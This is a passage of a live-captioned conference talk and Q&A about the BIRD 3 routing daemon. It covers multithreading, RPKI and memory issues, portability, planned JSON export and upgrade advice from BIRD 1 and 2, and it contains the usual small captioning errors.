Anyway, it also breaked RPKI so I had to make RPKI ‑‑ or have its own thread to not suffer from the BGP ‑‑ from lots BGPs. I want to say thank you DE‑CIX for testing. I spent almost three years on doing ‑‑ doing that thing, then I finally managed to convince Ondrej Filip to release it. And after an afternoon, I have three months or more of work to be done. Thank you, DE‑CIX. Anyway, for now, please don't call ROA checks from CLI in BIRD 3, it will just fail. There are some problems with memory management, as if you have lots of CPUs and all of them need some memory and some buffering, it will eat more memory than before, but we are ‑‑ we are working quite hard to reduce it. And there are some problems with implementations from recent years, so, for example, when there are some auxiliary tables, they are implemented in such a bad way that they have to be completely rewritten, which is something I have been doing almost right now. There are also some problems which I completely forgotten about, for example MRT dumps. There are simply some parts of internal API that I completely missed when doing the work, so if I can recommend anything to you, please do documentation, please do it even if you are doing little changes and please do it from the beginning to the end and beyond. Do the documentation, document everything. Or you can get into my place and, I know IM, code cleaning lady but I would like not to clean such a mess. Also, due to the long time, I couldn't merge BMP and Flow Spec validation just becaused it used parts of internal API that wasn't there before and the new API, my colleague Andrei implemented was completely unmergeable with the ‑‑ we will have to rewrite parts of this as well.
And I also want to say sorry to all your BSD folks, it's been a long history of portability issues, we are trying our best, but you can see even in the ‑‑ in this ‑‑ read it from the end, from the bottom up, there are three commits in one day, hey it's April 1. Trying to fix some portability issues in 3B SD. There were obviously better days. Of Martin, but he did a good job. I must say he did a good job.
Anyway, by solving lots of our technology codex. I can also permit you and it's something like salvation is coming or so, we will have the JSON route export, not in the first version of BIRD 3, but we will have it; it's possible now. It hasn't been. We are going to unify the route names so you don't have to check whether the BGP next‑hop is written in filters this way or that way and in the attribute dump in another way, just because some programmer, some developer in 1999 decided to name these two things differently. This one thing differently in two places, to say better. We will have non‑blocking reconfiguration which is something lots of people ask for. Well, I know some of you are parsing the configuration file for 20 seconds. We know it. We can't make this much faster because it simply takes the time to parse all of your IP addresses. We are not generating your gigabit config files but we can, finally, offset this reconfiguration and this parsing to another CPU to not block the BGP, and I ‑‑ as far as I can remember, the FreeBSD has finally implemented some years ago a better synchronisation, a better synchronisation API for routes. So in FreeBSD we will probably be implementing that. In the others, we will just offset that route synchronisation to another set.
So, that's it. And knowing what is broken, try BIRD 3, today, tomorrow, or any day, but please don't do these things, I had told you do not do. And put your BIRD into a C group. Thank you. Any questions?
(Applause)
JAN ZORZ: Thank you very much.
DMITRY KOHMANYUK: I have seen one text question, may I read it first.
JAN ZORZ: Read it.
DMITRY KOHMANYUK: If you send me text questions before do this before the speaker ends talking so you get ‑‑ Alexander from Qrator Labs: Do you plan JSON expert for other stuff like show protocols?
MARIA MATEJKA: Well, I think it will come as well. The ultimate goal is to render BIRD watch obsolete.
TOM STRICKS: First of all, thanks for that and it's very much appreciated. Would it be possible to expand a bit on what your strategy is, I guess, to make BGP converge when you are multi‑threading it because I guess you are treating tables differently?
MARIA MATEJKA: Sorry, I may miss ‑‑ maybe missed the point. Our strategy is in BGP convergence?
TOM STRICKS: So how do you deal with the fact that you are running in separate threads for separate neighbours and how do you get to a point where you have a single unified forward table?
MARIA MATEJKA: Well the table is for, for now, the table has one lock, so it's syncronised on the table. In future there will be probably a local structure or something like that even to make it even faster. Anyway, the single source of truth is the table, and anyway, if something is in the table it doesn't mean it's exported, there is in, BIRD 3, some queue, there is a journal which needs to be processed by every exporting connection, where you are exporting protocol to process the routes. In BIRD 1 and 2 these are actively pushed into the protocols, in BIRD 3 they have to pick up them, which can lead to quite big buffers, when one single protocol is taking their time to do everything what they need and the others are completely finished, so it can be in the worst case something like all the updates that have come from before.
TOM STRICKS: Thank you.
SPEAKER: Very nice talk, I am from AMS‑IX, by the way. Partially I got my answer from the previous reply, that's good. Then I have a second question. Where this feature that I really promising are coming to let's say their final release?
MARIA MATEJKA: Well, the first goal is to make it stable and to fix these problems I was speaking about. So, until our way is capable to be called from CLI, you are getting no JSON. And on a quite personal note, I don't know whether you are going to get any JSON.
SPEAKER: Right.
MARIA MATEJKA: You remember me.
SPEAKER: I know. Then the second question: So I know that a lot of us still having BIRD 168, maybe having plans to go to BIRD 2, so we wait for BIRD 3 or we should go for BIRD 2 and give you some time to work on the bugs?
MARIA MATEJKA: That's a good question. I think it's okay to go to BIRD 2 because, as far as ‑‑ well ‑‑
SPEAKER: Well going from one BIRD version to another is a painful process.
MARIA MATEJKA: We thought at least three months ago, we thought it would be okay to move to BIRD 2 because the transfer between BIRD 2 and BIRD 3 just be just locking BIRD into C group. Anyway, it looks like we will have some little changes, like displaying the extended attributes of routes in the slightly different way. So, if you are ‑‑ if you are most concerned about a configuration, you may simply go to the Version 2, anyway there are quite a lot of changes between Version 1 and 2, CLI output.
SPEAKER: Yes
MARIA MATEJKA: And there will be quite a substantial amount of changes in the ‑‑ another way between 2 and 3.
SPEAKER: Okay
MARIA MATEJKA: So if you are concerned about the CLI output, you should probably wait for BIRD 3.
SPEAKER: And the configuration actually, the configuration file?
MARIA MATEJKA: The configuration file should remain almost the same. Anyway, if you manage to wait for, well, it was five years, from release of BIRD 2, you can wait another year.
SPEAKER: Thank you very much.
JAN ZORZ: So you are actually looking for more alpha testers, right?
MARIA MATEJKA: Well, in fact ‑‑
JAN ZORZ: More work.
MARIA MATEJKA: There are some people who are already in production. Anyway, they don't call away from CLI.
SPEAKER: Max Milan. Thanks for this, I know it's complicated. Are there any plans to implement IS‑IS in BIRD 3?
MARIA MATEJKA: Implementing IS‑IS was quite a political issue several years ago. Anyway, now I think if we get enough time and people to do it, there is no problem with it. Also contributions are appreciated.
JAN ZORZ: Thank you. Are there on line questions?
DMITRY KOHMANYUK: No, I am double‑checking but it looks like we are done.
JAN ZORZ: Any other question? No? Three, two, one, go. Thank you.
(Applause).
JAN ZORZ: This is it for today, we are five minutes early for the break but have a good coffee. Thank you.
LIVE CAPTIONING BY AOIFE DOWNES, RPR
DUBLIN, IRELAND